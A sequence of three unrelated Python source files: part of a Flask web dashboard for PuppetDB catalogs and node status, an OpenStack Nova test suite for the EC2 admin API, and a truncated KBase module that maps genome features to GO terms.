'*': query.add(EqualsOperator("catalog_environment", env)) if search_arg: query.add(RegexOperator("certname", r"%s" % search_arg)) query.add(NullOperator("catalog_timestamp", False)) nodes = get_or_abort(puppetdb.nodes, query=query, include_total=True, order_by=order_args, **paging_args) catalog_list = [] total = None for node in nodes: if total is None: total = puppetdb.total catalog_list.append({ 'certname': node.name, 'catalog_timestamp': node.catalog_timestamp, 'form': compare, }) if total is None: total = 0 return render_template( 'catalogs.json.tpl', total=total, total_filtered=total, draw=draw, columns=CATALOGS_COLUMNS, catalogs=catalog_list, envs=envs, current_env=env) @app.route('/catalog/<node_name>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/catalog/<node_name>') def catalog_node(env, node_name): """Fetches from PuppetDB the compiled catalog of a given node. :param env: Find the catalog with this environment value :type env: :obj:`string` """ envs = environments() check_env(env, envs) if app.config['ENABLE_CATALOG']: catalog = get_or_abort(puppetdb.catalog, node=node_name) return render_template('catalog.html', catalog=catalog, envs=envs, current_env=env) else: log.warn('Access to catalog interface disabled by administrator') abort(403) @app.route('/catalogs/compare/<compare>...<against>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/catalogs/compare/<compare>...<against>') def catalog_compare(env, compare, against): """Compares the catalog of one node, parameter compare, with that of with that of another node, parameter against. :param env: Ensure that the 2 catalogs are in the same environment :type env: :obj:`string` """ envs = environments() check_env(env, envs) if app.config['ENABLE_CATALOG']: compare_cat = get_or_abort(puppetdb.catalog, node=compare) against_cat = get_or_abort(puppetdb.catalog, node=against) return render_template('catalog_compare.html', compare=compare_cat, against=against_cat, envs=envs, current_env=env) else: log.warn('Access to catalog interface disabled by administrator') abort(403) @app.route('/radiator', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/radiator') def radiator(env): """This view generates a simplified monitoring page akin to the radiator view in puppet dashboard """ envs = environments() check_env(env, envs) if env == '*': db_version = get_db_version(puppetdb) query_type, metric_version = metric_params(db_version) query = None metrics = get_or_abort( puppetdb.metric, 'puppetlabs.puppetdb.population:%sname=num-nodes' % query_type, version=metric_version) num_nodes = metrics['Value'] else: query = AndOperator() metric_query = ExtractOperator() query.add(EqualsOperator("catalog_environment", env)) metric_query.add_field(FunctionOperator('count')) metric_query.add_query(query) metrics = get_or_abort( puppetdb._query, 'nodes', query=metric_query) num_nodes = metrics[0]['count'] nodes = puppetdb.nodes( query=query, unreported=app.config['UNRESPONSIVE_HOURS'], with_status=True ) stats = { 'changed_percent': 0, 'changed': 0, 'failed_percent': 0, 'failed': 0, 'noop_percent': 0, 'noop': 0, 'skipped_percent': 0, 'skipped': 0, 'unchanged_percent': 0, 'unchanged': 0, 'unreported_percent': 0, 'unreported': 0, } for node in nodes: if node.status == 'unreported': stats['unreported'] += 1 elif node.status == 'changed': stats['changed'] += 1 elif node.status == 'failed': stats['failed'] += 1 elif node.status == 'noop': stats['noop'] += 1 elif node.status == 'skipped': stats['skipped'] += 1 else: stats['unchanged'] += 1 try: stats['changed_percent'] = int(100 * (stats['changed'] / float(num_nodes))) stats['failed_percent'] = int(100 * stats['failed'] / float(num_nodes)) stats['noop_percent'] = int(100 * stats['noop'] / float(num_nodes)) stats['skipped_percent'] = int(100 * (stats['skipped'] / float(num_nodes))) stats['unchanged_percent'] = int(100 * (stats['unchanged'] / float(num_nodes))) stats['unreported_percent'] = int(100 * (stats['unreported'] / float(num_nodes))) except ZeroDivisionError: stats['changed_percent'] = 0 stats['failed_percent'] = 0 stats['noop_percent'] = 0 stats['skipped_percent'] = 0 stats['unchanged_percent'] = 0 stats['unreported_percent'] = 0 if ('Accept' in request.headers and request.headers["Accept"] == 'application/json'): return jsonify(**stats) return render_template( 'radiator.html', stats=stats, total=num_nodes ) @app.route('/daily_reports_chart.json', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/daily_reports_chart.json') def daily_reports_chart(env): """Return JSON data to generate a bar chart of daily runs. If certname is passed as GET argument, the data will target that node only. """ certname = request.args.get('certname') result = get_or_abort( get_daily_reports_chart, db=puppetdb, env=env, days_number=app.config['DAILY_REPORTS_CHART_DAYS'], certname=certname, ) return jsonify(result=result) @app.route('/offline/<path:filename>') def offline_static(filename): mimetype = 'text/html' if filename.endswith('.css'): mimetype = 'text/css' elif filename.endswith('.js'): mimetype = 'text/javascript' return Response(response=render_template('static/%s' % filename), status=200, mimetype=mimetype) @app.route('/status') def health_status(): return 'OK'
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for api.ec2.admin""" import datetime from nova import context from nova import db from nova import exception from nova import flags from nova import test from nova import utils from nova.api.ec2 import admin from nova.api.ec2 import ec2utils from nova.cloudpipe import pipelib from nova.compute import vm_states class AdminTestCase(test.TestCase): def setUp(self): super(AdminTestCase, self).setUp() self.stubs.Set(utils, 'vpn_ping', lambda address, port: address == '127.0.0.1') def test_user_dict(self): user = type('User', (object,), {'id': 'bob', 'access': 'foo', 'secret': 'bar'}) expected_user_dict = {'username': 'bob', 'accesskey': 'foo', 'secretkey': 'bar', 'file': 'filename'} self.assertEqual(expected_user_dict, admin.user_dict(user, 'filename')) def test_user_dict_no_file(self): user = type('User', (object,), {'id': 'bob', 'access': 'foo', 'secret': 'bar'}) expected_user_dict = {'username': 'bob', 'accesskey': 'foo', 'secretkey': 'bar', 'file': None} self.assertEqual(expected_user_dict, admin.user_dict(user)) def test_user_dict_no_user(self): self.assertEqual({}, admin.user_dict(None)) def test_project_dict(self): project = type('Project', (object,), {'id': 'project', 'project_manager_id': 'foo', 'description': 'bar'}) expected_project_dict = {'projectname': 'project', 'project_manager_id': 'foo', 'description': 'bar'} self.assertEqual(expected_project_dict, admin.project_dict(project)) def test_project_dict_no_project(self): self.assertEqual({}, admin.project_dict(None)) def test_host_dict_using_updated_at(self): # instances and volumes only used for count instances = range(2) volumes = range(3) now = datetime.datetime.now() updated_at = now - datetime.timedelta(seconds=10) compute_service = {'updated_at': updated_at} volume_service = {'updated_at': updated_at} expected_host_dict = {'hostname': 'server', 'instance_count': 2, 'volume_count': 3, 'compute': 'up', 'volume': 'up'} self.assertEqual(expected_host_dict, admin.host_dict('server', compute_service, instances, volume_service, volumes, now)) def test_host_dict_service_down_using_created_at(self): # instances and volumes only used for count instances = range(2) volumes = range(3) # service_down_time is 60 by defualt so we set to 70 to simulate # services been down now = datetime.datetime.now() created_at = now - datetime.timedelta(seconds=70) compute_service = {'created_at': created_at, 'updated_at': None} volume_service = {'created_at': created_at, 'updated_at': None} expected_host_dict = {'hostname': 'server', 'instance_count': 2, 'volume_count': 3, 'compute': 'down', 'volume': 'down'} self.assertEqual(expected_host_dict, admin.host_dict('server', compute_service, instances, volume_service, volumes, now)) def test_instance_dict(self): inst = {'name': 'this_inst', 'memory_mb': 1024, 'vcpus': 2, 'local_gb': 500, 'flavorid': 1} expected_inst_dict = {'name': 'this_inst', 'memory_mb': 1024, 'vcpus': 2, 'disk_gb': 500, 'flavor_id': 1} self.assertEqual(expected_inst_dict, admin.instance_dict(inst)) def test_vpn_dict_state_running(self): isonow = datetime.datetime.utcnow() vpn_instance = {'id': 1, 'created_at': isonow, 'fixed_ip': {'address': '127.0.0.1'}} project = type('Project', (object,), {'id': 'project', 'vpn_ip': '127.0.0.1', 'vpn_port': 1234}) # Returns state running for 127.0.0.1 - look at class setup expected_vpn_dict = {'project_id': 'project', 'public_ip': '127.0.0.1', 'public_port': 1234, 'internal_ip': '127.0.0.1', 'instance_id': ec2utils.id_to_ec2_id(1), 'created_at': utils.isotime(isonow), 'state': 'running'} self.assertEqual(expected_vpn_dict, admin.vpn_dict(project, vpn_instance)) def test_vpn_dict_state_down(self): isonow = datetime.datetime.utcnow() vpn_instance = {'id': 1, 'created_at': isonow, 'fixed_ip': {'address': '127.0.0.1'}} project = type('Project', (object,), {'id': 'project', 'vpn_ip': '127.0.0.2', 'vpn_port': 1234}) # Returns state down for 127.0.0.2 - look at class setup vpn_dict = admin.vpn_dict(project, vpn_instance) self.assertEqual('down', vpn_dict['state']) def test_vpn_dict_invalid_project_vpn_config(self): isonow = datetime.datetime.utcnow() vpn_instance = {'id': 1, 'created_at': isonow, 'fixed_ip': {'address': '127.0.0.1'}} # Inline project object - vpn_port of None to make it invalid project = type('Project', (object,), {'id': 'project', 'vpn_ip': '127.0.0.2', 'vpn_port': None}) # Returns state down for 127.0.0.2 - look at class setup vpn_dict = admin.vpn_dict(project, vpn_instance) self.assertEqual('down - invalid project vpn config', vpn_dict['state']) def test_vpn_dict_non_vpn_instance(self): project = type('Project', (object,), {'id': 'project', 'vpn_ip': '127.0.0.1', 'vpn_port': '1234'}) expected_vpn_dict = {'project_id': 'project', 'public_ip': '127.0.0.1', 'public_port': '1234', 'state': 'pending'} self.assertEqual(expected_vpn_dict, admin.vpn_dict(project, None)) class AdminControllerTestCase(test.TestCase): @classmethod def setUpClass(cls): cls._c = context.get_admin_context() cls._ac = admin.AdminController() def test_admin_controller_to_str(self): self.assertEqual('AdminController', str(admin.AdminController())) def test_describe_instance_types(self): insts = self._ac.describe_instance_types(self._c)['instanceTypeSet'] for inst_name in ('m1.medium', 'm1.large', 'm1.tiny', 'm1.xlarge', 'm1.small',): self.assertIn(inst_name, [i['name'] for i in insts]) def test_register_user(self): registered_user = self._ac.register_user(self._c, 'bob') self.assertEqual('bob', registered_user['username']) def test_describe_user(self): self._ac.register_user(self._c, 'bob') self.assertEqual('bob', self._ac.describe_user(self._c, 'bob')['username']) def test_describe_users(self): self._ac.register_user(self._c, 'bob') users = self._ac.describe_users(self._c) self.assertIn('userSet', users) self.assertEqual('bob', users['userSet'][0]['username']) def test_deregister_user(self): self._ac.register_user(self._c, 'bob') self._ac.deregister_user(self._c, 'bob') self.assertRaises(exception.UserNotFound, self._ac.describe_user, self._c, 'bob') def test_register_project(self): self._ac.register_user(self._c, 'bob') self.assertEqual('bobs_project', self._ac.register_project(self._c, 'bobs_project', 'bob')['projectname']) def test_describe_projects(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') projects = self._ac.describe_projects(self._c) self.assertIn('projectSet', projects) self.assertEqual('bobs_project', projects['projectSet'][0]['projectname']) def test_deregister_project(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.deregister_project(self._c, 'bobs_project') self.assertRaises(exception.ProjectNotFound, self._ac.describe_project, self._c, 'bobs_project') def test_describe_project_members(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') members = self._ac.describe_project_members(self._c, 'bobs_project') self.assertIn('members', members) self.assertEqual('bob', members['members'][0]['member']) def test_modify_project(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_project(self._c, 'bobs_project', 'bob', description='I like cake') project = self._ac.describe_project(self._c, 'bobs_project') self.assertEqual('I like cake', project['description']) def test_modify_project_member_add(self): self._ac.register_user(self._c, 'bob') self._ac.register_user(self._c, 'mary') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_project_member(self._c, 'mary', 'bobs_project', 'add') members = self._ac.describe_project_members(self._c, 'bobs_project') self.assertIn('mary', [m['member'] for m in members['members']]) def test_modify_project_member_remove(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_project_member(self._c, 'bob', 'bobs_project', 'remove') members = self._ac.describe_project_members(self._c, 'bobs_project') self.assertNotIn('bob', [m['member'] for m in members['members']]) def test_modify_project_member_invalid_operation(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self.assertRaises(exception.ApiError, self._ac.modify_project_member, self._c, 'bob', 'bobs_project', 'invalid_operation') def test_describe_roles(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') roles = self._ac.describe_roles(self._c, 'bobs_project') # Default roles ('sysadmin', 'netadmin', 'developer') should be in here roles = [r['role'] for r in roles['roles']] for role in ('sysadmin', 'netadmin', 'developer'): self.assertIn('sysadmin', roles) def test_modify_user_role_add(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_user_role(self._c, 'bob', 'itsec') user_roles = self._ac.describe_user_roles(self._c, 'bob') self.assertIn('itsec', [r['role'] for r in user_roles['roles']]) def test_modify_user_role_project_add(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_user_role(self._c, 'bob', 'developer', 'bobs_project') user_roles = self._ac.describe_user_roles(self._c, 'bob', 'bobs_project') self.assertIn('developer', [r['role'] for r in user_roles['roles']]) def test_modify_user_role_remove(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_user_role(self._c, 'bob', 'itsec') self._ac.modify_user_role(self._c, 'bob', 'itsec', operation='remove') user_roles = self._ac.describe_user_roles(self._c, 'bob') self.assertNotIn('itsec', [r['role'] for r in user_roles['roles']]) def test_modify_user_role_project_remove(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_user_role(self._c, 'bob', 'developer', 'bobs_project') self._ac.modify_user_role(self._c, 'bob', 'developer', 'bobs_project', 'remove') user_roles = self._ac.describe_user_roles(self._c, 'bob', 'bobs_project') self.assertNotIn('developer', [r['role'] for r in user_roles['roles']]) def test_modify_user_role_invalid(self): self.assertRaises(exception.ApiError, self._ac.modify_user_role, self._c, 'bob', 'itsec', operation='invalid_operation') def test_describe_hosts_compute(self): db.service_create(self._c, {'host': 'host1', 'binary': "nova-compute", 'topic': 'compute', 'report_count': 0, 'availability_zone': "zone1"}) hosts = self._ac.describe_hosts(self._c)['hosts'] self.assertEqual('host1', hosts[0]['hostname']) def test_describe_hosts_volume(self): db.service_create(self._c, {'host': 'volume1', 'binary': "nova-volume", 'topic': 'volume', 'report_count': 0, 'availability_zone': "zone1"}) hosts = self._ac.describe_hosts(self._c)['hosts'] self.assertEqual('volume1', hosts[0]['hostname']) def test_block_external_addresses(self): result = self._ac.block_external_addresses(self._c, '192.168.100.1/24') self.assertEqual('OK', result['status']) self.assertEqual('Added 3 rules', result['message']) def test_block_external_addresses_already_existent_rule(self): self._ac.block_external_addresses(self._c, '192.168.100.1/24') self.assertRaises(exception.ApiError, self._ac.block_external_addresses, self._c, '192.168.100.1/24') def test_describe_external_address_blocks(self): self._ac.block_external_addresses(self._c, '192.168.100.1/24') self.assertEqual( {'externalIpBlockInfo': [{'cidr': u'192.168.100.1/24'}]}, self._ac.describe_external_address_blocks(self._c)) def test_remove_external_address_block(self): self._ac.block_external_addresses(self._c, '192.168.100.1/24') result = self._ac.remove_external_address_block(self._c, '192.168.100.1/24') self.assertEqual('OK', result['status']) self.assertEqual('Deleted 3 rules', result['message']) result = self._ac.describe_external_address_blocks(self._c) self.assertEqual([], result['externalIpBlockInfo']) def test_start_vpn(self): def fake_launch_vpn_instance(self, *args): pass def get_fake_instance_func(): first_call = [True] def fake_instance_get_all_by_project(self, *args): if first_call[0]: first_call[0] = False return [] else: return [{'id': 1, 'user_id': 'bob', 'image_id': str(flags.FLAGS.vpn_image_id), 'project_id': 'bobs_project', 'instance_type_id': '1', 'os_type': 'linux', 'architecture': 'x86-64', 'state_description': 'running', 'vm_state': vm_states.ACTIVE, 'image_ref': '3'}] return fake_instance_get_all_by_project self.stubs.Set(pipelib.CloudPipe, 'launch_vpn_instance', fake_launch_vpn_instance) self.stubs.Set(db, 'instance_get_all_by_project', get_fake_instance_func()) self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self.assertEqual('i-00000001', self._ac.start_vpn(self._c, 'bobs_project')['instance_id']) def test_describe_vpns(self): def fake_instance_get_all_by_project(self, *args): now = datetime.datetime.now() created_at = now - datetime.timedelta(seconds=70) return [{'id': 1, 'user_id': 'bob', 'image_id': str(flags.FLAGS.vpn_image_id), 'project_id': 'bobs_project', 'instance_type_id': '1', 'os_type': 'linux', 'architecture': 'x86-64', 'state_description': 'running', 'created_at': created_at, 'vm_state': vm_states.ACTIVE, 'image_ref': '3'}] self.stubs.Set(db, 'instance_get_all_by_project', fake_instance_get_all_by_project) self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') vpns = self._ac.describe_vpns(self._c) self.assertIn('items', vpns) item = vpns['items'][0] self.assertEqual('i-00000001', item['instance_id']) self.assertEqual(None, item['public_port']) self.assertEqual(None, item['public_ip']) self.assertEqual('down - invalid project vpn config', item['state']) self.assertEqual(u'bobs_project', item['project_id'])
#BEGIN_HEADER # The header block is where all import statments should live import csv import os import re import subprocess import sys import time import traceback import uuid from pprint import pprint, pformat from biokbase.workspace.client import Workspace as workspaceService from Bio import SeqIO from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord #END_HEADER class ElectronicAnnotationMethods: ''' Module Name: ElectronicAnnotationMethods Module Description: A KBase module: ElectronicAnnotationMethods This module wraps the following methods: interpro2go -> InterPro2GO ec2go -> EC2GO uniprotkb_keyword2go -> UniProtKB-Keyword2GO ''' ######## WARNING FOR GEVENT USERS ####### # Since asynchronous IO can lead to methods - even the same method - # interrupting each other, you must be *very* careful when using global # state. A method could easily clobber the state set by another while # the latter method is running. ######################################### #BEGIN_CLASS_HEADER # Class variables and functions can be defined in this block workspaceURL = None def genome_to_protein_fasta(self, genome, fasta_file): records = [] for feature in genome['features']: if 'protein_translation' not in feature: continue record = SeqRecord(Seq(feature['protein_translation']), id=feature['id'], description=feature['function']) records.append(record) SeqIO.write(records, fasta_file, "fasta") def uniq_seen(self, iterable): seen = set() seen_add = seen.add return [x for x in iterable if not (x in seen or seen_add(x))] def equiv_term_to_string(self, x): s = x['equiv_term'] if 'equiv_name' in x: name = x['equiv_name'] s += ' ' + re.sub(r'^GO:', '', name) return s def add_ontology_string_to_feature(self, fea, s): term, name = s.split(" ", 1) if not 'ontology' in fea: fea['ontology'] = {} if 'GO' not in fea['ontology']: fea['ontology']['GO'] = [] fea['ontology']['GO'].append([term, name]) def add_concat_ontology_string_to_feature(self, fea, s): for ss in s.split(' / '): self.add_ontology_string_to_feature(fea, ss) #END_CLASS_HEADER # config contains contents of config file in a hash or None if it couldn't # be found def __init__(self, config): #BEGIN_CONSTRUCTOR self.workspaceURL = config['workspace-url'] self.scratch = os.path.abspath(config['scratch']) if not os.path.exists(self.scratch): os.makedirs(self.scratch) #END_CONSTRUCTOR pass def remap_annotations_with_interpro2go(self, ctx, params): # ctx is the context object # return variables are: output #BEGIN remap_annotations_with_interpro2go # Print statements to stdout/stderr are captured and available as the method log print('Starting remap_annotations_with_interpro2go method...') # Step 1 - Parse/examine the parameters and catch any errors # It is important to check that parameters exist and are defined, and that nice error # messages are returned to the user if 'workspace' not in params: raise ValueError('Parameter workspace is not set in input arguments') workspace_name = params['workspace'] if 'input_genome' not in params: raise ValueError('Parameter input_genome is not set in input arguments') input_genome = params['input_genome'] if 'output_genome' not in params: raise ValueError('Parameter output_genome is not set in input arguments') output_genome = params['output_genome'] ontology_translation = params.get('ontology_translation') overwrite_function = params.get('overwrite_function') # Step 2- Download the input data # Most data will be based to your method by its workspace name. Use the workspace to pull that data # (or in many cases, subsets of that data). The user token is used to authenticate with the KBase # data stores and other services. DO NOT PRINT OUT OR OTHERWISE SAVE USER TOKENS token = ctx['token'] wsClient = workspaceService(self.workspaceURL, token=token) try: # Note that results from the workspace are returned in a list, and the actual data is saved # in the 'data' key. So to get the ContigSet data, we get the first element of the list, and # look at the 'data' field. genome = wsClient.get_objects([{'ref': workspace_name+'/'+input_genome}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading input Genome object from workspace:\n' + orig_error) print('Got input genome data.') # Load translation object from default or user-specified table translation_ws = workspace_name translation_name = ontology_translation if not translation_name: translation_ws = 'KBaseOntology' translation_name = 'interpro2go' try: translation = wsClient.get_objects([{'ref': translation_ws+'/'+translation_name}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading OntologyTranslation object from workspace:\n' + orig_error) trans = translation['translation'] print('Got translation table from {}/{}.'.format(translation_ws, translation_name)) # Step 3- Actually perform the interpro2go mapping operation # Create feature protein FASTA as input for interproscan fasta_path = os.path.join(self.scratch, 'protein.fa') interpro_out = os.path.join(self.scratch, 'protein.tsv') self.genome_to_protein_fasta(genome, fasta_path) # Run interproscan in standalone mode cmd = ['interproscan.sh', '-i', fasta_path, '-f', 'tsv', '-o', interpro_out, '--disable-precalc', '-goterms', '-iprlookup', '-hm' ] print('Run CMD: {}'.format(' '.join(cmd))) p = subprocess.Popen(cmd, cwd = self.scratch, shell = False) p.wait() print('CMD return code: {}'.format(p.returncode)) # Add GO terms to Genome object fid_to_go = {} with open(interpro_out, 'r') as tsv: tsv = csv.reader(tsv, delimiter='\t') for row in tsv: if len(row) < 12: continue fid, beg, end, domain = row[0], row[6], row[7], row[11] # orig_go_terms = None # if len(row) >= 14: # orig_go_terms = row[13] go_terms = None key = 'InterPro:'+domain equiv_terms = trans.get(key) if equiv_terms: go = map(lambda x: self.equiv_term_to_string(x), equiv_terms['equiv_terms']) fid_to_go[fid] = ' / '.join(sorted(go)) n_total_features = 0 n_features_mapped = 0 for fea in genome['features']: fid = fea['id'] n_total_features += 1 function = fea.get('function') if not function: continue if fid in fid_to_go: n_features_mapped += 1 go_func = fid_to_go[fid] self.add_concat_ontology_string_to_feature(fea, go_func) if overwrite_function: fea['function'] = go_func print('Mapped {} from "{}" to "{}".'.format(fid, function, go_func)) # anno = fea['annotations'] if 'annotations' in fea else [] # anno.append([fid_to_go[fid], 'interpro2go', int(time.time())]) # print('Mapped {} to {}.'.format(fid, fid_to_go[fid])) # Step 4- Save the new Genome back to the Workspace # When objects are saved, it is important to always set the Provenance of that object. The basic # provenance info is given to you as part of the context object. You can add additional information # to the provenance as necessary. Here we keep a pointer to the input data object. provenance = [{}] if 'provenance' in ctx: provenance = ctx['provenance'] # add additional info to provenance here, in this case the input data object reference provenance[0]['input_ws_objects']=[workspace_name+'/'+input_genome] obj_info_list = None try: obj_info_list = wsClient.save_objects({ 'workspace':workspace_name, 'objects': [ { 'type':'KBaseGenomes.Genome', 'data':genome, 'name':output_genome, 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving output Genome object to workspace:\n' + orig_error) info = obj_info_list[0] # Workspace Object Info is a tuple defined as- # absolute ref = info[6] + '/' + info[0] + '/' + info[4] # 0 - obj_id objid - integer valued ID of the object # 1 - obj_name name - the name of the data object # 2 - type_string type - the full type of the data object as: [ModuleName].[Type]-v[major_ver].[minor_ver] # 3 - timestamp save_date # 4 - int version - the object version number # 5 - username saved_by # 6 - ws_id wsid - the unique integer valued ID of the workspace containing this object # 7 - ws_name workspace - the workspace name # 8 - string chsum - md5 of the sorted json content # 9 - int size - size of the json content # 10 - usermeta meta - dictionary of string keys/values of user set or auto generated metadata print('Saved output Genome:'+pformat(info)) # Step 5- Create the Report for this method, and return the results # Create a Report of the method report = 'New Genome saved to: '+str(info[7]) + '/'+str(info[1])+'/'+str(info[4])+'\n' report += 'Number of total features: '+ str(n_total_features) + '\n' report += 'Number of features mapped to GO terms: '+ str(n_features_mapped) + '\n' reportObj = { 'objects_created':[{ 'ref':str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'description':'Genome with annotation remapped using interpro2go' }], 'text_message':report } # generate a unique name for the Method report reportName = 'interpro2go_report_'+str(hex(uuid.getnode())) report_info_list = None try: report_info_list = wsClient.save_objects({ 'id':info[6], 'objects':[ { 'type':'KBaseReport.Report', 'data':reportObj, 'name':reportName, 'meta':{}, 'hidden':1, # important! make sure the report is hidden 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving report object to workspace:\n' + orig_error) report_info = report_info_list[0] print('Saved Report: '+pformat(report_info)) output = { 'report_name': reportName, 'report_ref': str(report_info[6]) + '/' + str(report_info[0]) + '/' + str(report_info[4]), 'output_genome_ref': str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'n_total_features':n_total_features, 'n_features_mapped':n_features_mapped } print('Returning: '+pformat(output)) #END remap_annotations_with_interpro2go # At some point might do deeper type checking... if not isinstance(output, dict): raise ValueError('Method remap_annotations_with_interpro2go return value ' + 'output is not type dict as required.') # return the results return [output] def remap_annotations_with_ec2go(self, ctx, params): # ctx is the context object # return variables are: output #BEGIN remap_annotations_with_ec2go # Print statements to stdout/stderr are captured and available as the method log print('Starting remap_annotations_with_ec2go method...') # Step 1 - Parse/examine the parameters and catch any errors # It is important to check that parameters exist and are defined, and that nice error # messages are returned to the user if 'workspace' not in params: raise ValueError('Parameter workspace is not set in input arguments') workspace_name = params['workspace'] if 'input_genome' not in params: raise ValueError('Parameter input_genome is not set in input arguments') input_genome = params['input_genome'] if 'output_genome' not in params: raise ValueError('Parameter output_genome is not set in input arguments') output_genome = params['output_genome'] ontology_translation = params.get('ontology_translation') overwrite_function = params.get('overwrite_function') # Step 2- Download the input data # Most data will be based to your method by its workspace name. Use the workspace to pull that data # (or in many cases, subsets of that data). The user token is used to authenticate with the KBase # data stores and other services. DO NOT PRINT OUT OR OTHERWISE SAVE USER TOKENS token = ctx['token'] wsClient = workspaceService(self.workspaceURL, token=token) try: # Note that results from the workspace are returned in a list, and the actual data is saved # in the 'data' key. So to get the ContigSet data, we get the first element of the list, and # look at the 'data' field. genome = wsClient.get_objects([{'ref': workspace_name+'/'+input_genome}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading input Genome object from workspace:\n' + orig_error) print('Got input genome data.') # Load translation object from default or user-specified table translation_ws = workspace_name translation_name = ontology_translation if not translation_name: translation_ws = 'KBaseOntology' translation_name = 'ec2go' try: translation = wsClient.get_objects([{'ref': translation_ws+'/'+translation_name}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading OntologyTranslation object from workspace:\n' + orig_error) trans = translation['translation'] print('Got translation table from {}/{}.'.format(translation_ws, translation_name)) # Step 3- Actually perform the ec2go mapping operation # Add GO terms to Genome object # print trans n_total_features = 0 n_features_mapped = 0 for fea in genome['features']: n_total_features += 1 fid = fea['id'] function = fea.get('function') if not function: continue matches = re.findall('EC[ :][-0-9]+\.[-0-9]+\.[-0-9]+\.[-0-9]+', function) ec_list = self.uniq_seen(matches) go_list = [] for ec in ec_list: key = ec.replace("EC ", "EC:") equiv_terms = trans.get(key) if equiv_terms: go = map(lambda x: self.equiv_term_to_string(x), equiv_terms['equiv_terms']) go_list.extend(go) if len(go_list): n_features_mapped += 1 go_func = ' / '.join(sorted(go_list)) self.add_concat_ontology_string_to_feature(fea, go_func) if overwrite_function: fea['function'] = go_func print('Mapped {} from "{}" to "{}".'.format(fid, function, go_func)) # Step 4- Save the new Genome back to the Workspace # When objects are saved, it is important to always set the Provenance of that object. The basic # provenance info is given to you as part of the context object. You can add additional information # to the provenance as necessary. Here we keep a pointer to the input data object. provenance = [{}] if 'provenance' in ctx: provenance = ctx['provenance'] # add additional info to provenance here, in this case the input data object reference provenance[0]['input_ws_objects']=[workspace_name+'/'+input_genome] obj_info_list = None try: obj_info_list = wsClient.save_objects({ 'workspace':workspace_name, 'objects': [ { 'type':'KBaseGenomes.Genome', 'data':genome, 'name':output_genome, 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving output Genome object to workspace:\n' + orig_error) info = obj_info_list[0] # Workspace Object Info is a tuple defined as- # absolute ref = info[6] + '/' + info[0] + '/' + info[4] # 0 - obj_id objid - integer valued ID of the object # 1 - obj_name name - the name of the data object # 2 - type_string type - the full type of the data object as: [ModuleName].[Type]-v[major_ver].[minor_ver] # 3 - timestamp save_date # 4 - int version - the object version number # 5 - username saved_by # 6 - ws_id wsid - the unique integer valued ID of the workspace containing this object # 7 - ws_name workspace - the workspace name # 8 - string chsum - md5 of the sorted json content # 9 - int size - size of the json content # 10 - usermeta meta - dictionary of string keys/values of user set or auto generated metadata print('Saved output Genome:'+pformat(info)) # Step 5- Create the Report for this method, and return the results # Create a Report of the method report = 'New Genome saved to: '+str(info[7]) + '/'+str(info[1])+'/'+str(info[4])+'\n' report += 'Number of total features: '+ str(n_total_features) + '\n' report += 'Number of features mapped to GO terms: '+ str(n_features_mapped) + '\n' reportObj = { 'objects_created':[{ 'ref':str(info[6]) + 